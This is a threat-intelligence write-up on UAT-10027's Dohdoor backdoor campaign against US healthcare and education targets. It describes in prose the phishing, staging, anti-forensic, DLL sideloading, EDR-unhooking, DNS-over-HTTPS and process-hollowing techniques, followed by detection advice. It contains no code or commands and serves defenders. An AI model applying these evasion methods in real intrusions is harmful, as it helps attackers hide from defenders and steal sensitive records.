The rapid evolution of cyber espionage has introduced a formidable new adversary that specifically preys upon the structural vulnerabilities of American healthcare and educational institutions. This recently identified threat actor, designated by security researchers as UAT-10027, has been orchestrating a sophisticated multi-stage intrusion campaign since the closing months of 2025. At the heart of this activity is a previously undocumented backdoor known as Dohdoor, a piece of malware that distinguishes itself through its masterful use of legitimate network protocols and system binaries. By targeting sectors that typically manage vast amounts of sensitive data while operating under significant budgetary and staffing constraints, the adversary maximizes its potential for successful penetration. These organizations often find themselves struggling to keep pace with the high-level technical ingenuity displayed by modern threat actors, making them ideal candidates for long-term espionage or secondary extortion schemes that leverage stolen medical and financial records.
Strategic Communication via Encrypted Channels
One of the most innovative aspects of this campaign involves the way the malware communicates with its command-and-control infrastructure through the use of DNS-over-HTTPS. By leveraging encrypted DNS services provided by major platforms like Cloudflare, Dohdoor effectively cloaks its malicious traffic within standard HTTPS requests that appear entirely benign to traditional network monitoring tools. This approach bypasses the conventional security filters that typically flag suspicious DNS queries to unverified domains, as the traffic is indistinguishable from routine web browsing or authorized application updates. The shift toward utilizing encrypted protocols for malicious intent represents a significant hurdle for network administrators who rely on visibility into DNS traffic to identify and block connections to known malicious servers. Because the communication is encrypted from the point of origin, internal security appliances cannot easily inspect the payload of these requests without implementing complex decryption proxies.
Furthermore, the threat actor employs a highly deceptive naming convention for its subdomains and top-level domains to blend into the daily noise of a modern corporate network environment. By using strings that mimic legitimate software maintenance activities, such as those related to system updates or security check-ins, the malware reduces the likelihood of manual discovery by security analysts. The adversary utilizes irregular capitalization and non-standard top-level domains like “.OnLiNe,” “.DeSigN,” and “.SoFTWARe” to specifically circumvent automated security filters that rely on rigid string matching or standard domain lists. This psychological layering of the attack ensures that even if a query is logged, it may be dismissed by a human operator as a harmless, if strangely named, background process. This level of detail in the infrastructure setup demonstrates a deep understanding of how security operations centers prioritize alerts and the specific limitations of the automated tools they employ to manage massive volumes of data.
Living off the Land and Anti-Forensic Tactics
The infection chain utilized by UAT-10027 adheres to a strict living-off-the-land philosophy, which prioritizes the use of pre-installed Windows utilities over custom-built executable files. The initial breach typically originates from a carefully crafted phishing email that delivers a PowerShell script designed to execute immediately upon interaction. Rather than attempting to download a massive malware package all at once, this script invokes the legitimate Windows tool curl.exe to retrieve a secondary batch file from a remote staging server. This incremental approach allows the adversary to maintain a minimal footprint on the victim’s machine, as the individual commands and tools being used are common features of any standard administrative environment. By breaking the attack into several small, seemingly unrelated stages, the threat actor ensures that no single event is significant enough to trigger a high-severity alert within the security software, allowing the intrusion to progress quietly.
Building on this foundation of stealth, the secondary batch script performs aggressive anti-forensic measures to prevent investigators from reconstructing the timeline of the attack. It establishes hidden working directories in system folders like C:ProgramData or C:UsersPublic, which are frequently overlooked during casual inspections. Once the script has successfully prepared the environment for the next phase of the infection, it systematically wipes the Run command history from the system registry, clears the contents of the clipboard, and deletes its own source code. This self-deletion capability is crucial for maintaining long-term persistence, as it leaves behind very little evidence for forensic experts to analyze. The final execution of the core malware is achieved through DLL sideloading, where trusted Windows binaries such as mblctr.exe or Fondue.exe are manipulated into loading the malicious Dohdoor DLL files. By piggybacking on these signed and trusted processes, the malware successfully evades signature-based antivirus solutions.
Advanced Evasion and Payload Execution
Once the malware has established its initial foothold, it employs advanced technical maneuvers designed to effectively blind endpoint detection and response tools. This is primarily achieved through a technique known as syscall unhooking, where the malware patches critical system call stubs within the ntdll.dll library. Security products typically place monitoring hooks in these locations to observe and intercept suspicious activity, such as unauthorized memory access or process manipulation. By removing these hooks, Dohdoor ensures that its subsequent actions are invisible to the security software, allowing it to operate with nearly absolute impunity within the compromised system. This proactive dismantling of the host’s defenses is a hallmark of sophisticated state-sponsored actors who prioritize remaining undetected for as long as possible. Once the defensive software is neutralized, the malware can proceed with its primary objectives without fear of being blocked or quarantined by the automated response system. The ultimate goal of the Dohdoor loader is to facilitate the delivery of a final high-level payload, which recent investigations suggest is a Cobalt Strike Beacon based on specific JA3S hash signatures. After resolving its command-and-control server via the encrypted DNS-over-HTTPS channel, the malware parses JSON responses to receive instructions and download an encrypted payload package. This data is decrypted using a custom XOR-SUB algorithm that relies on a position-dependent cipher, a technique that makes static analysis extremely difficult for researchers who lack the specific decryption keys. Finally, the decrypted malicious code is injected into legitimate, long-running processes like OpenWith.exe or wab.exe via a method known as process hollowing. By replacing the memory of a legitimate application with its own code, the malware can execute its commands under the guise of a standard Windows process. This final layer of deception ensures that any remaining behavioral analysis tools see only the activities of a verified system component.
Defensive Strategies for Resilient Infrastructure
The analysis of UAT-10027’s methodology has revealed significant tactical overlaps with known sophisticated clusters, specifically in the way they handle domain naming and internal system unhooking. These findings indicated that the adversary was not merely an opportunistic criminal group but a highly organized entity with a clear strategic focus on maintaining access to sensitive American infrastructure. To counter such a persistent threat, organizations must move beyond traditional perimeter defenses and adopt a more granular approach to internal security monitoring. This includes the implementation of rigorous auditing for built-in Windows tools that are frequently misused in living-off-the-land attacks. By tracking the execution of utilities like curl.exe and mblctr.exe and flagging instances where they interact with unusual network resources or hidden system directories, administrators can identify the early warning signs of an intrusion before the malware has a chance to disable the primary defensive tools.
Moving forward, the primary focus for security teams should be the deployment of advanced endpoint detection solutions that are specifically designed to monitor the integrity of core system components like ntdll.dll. Since the malware’s effectiveness relied heavily on its ability to unhook system calls, any unauthorized modification to these files must be treated as a high-priority security event. Additionally, organizations should consider implementing specialized DNS inspection tools that are capable of decrypting and analyzing DNS-over-HTTPS traffic to detect the presence of anomalous subdomains or high-frequency queries to non-standard top-level domains. Strengthening the security posture of the healthcare and education sectors required a combination of automated detection and proactive threat hunting to uncover the subtle traces left behind by multi-stage loaders. By focusing on these specific technical weaknesses, defenders were able to build a more resilient infrastructure that was better equipped to withstand the sophisticated tactics employed by actors like UAT-10027.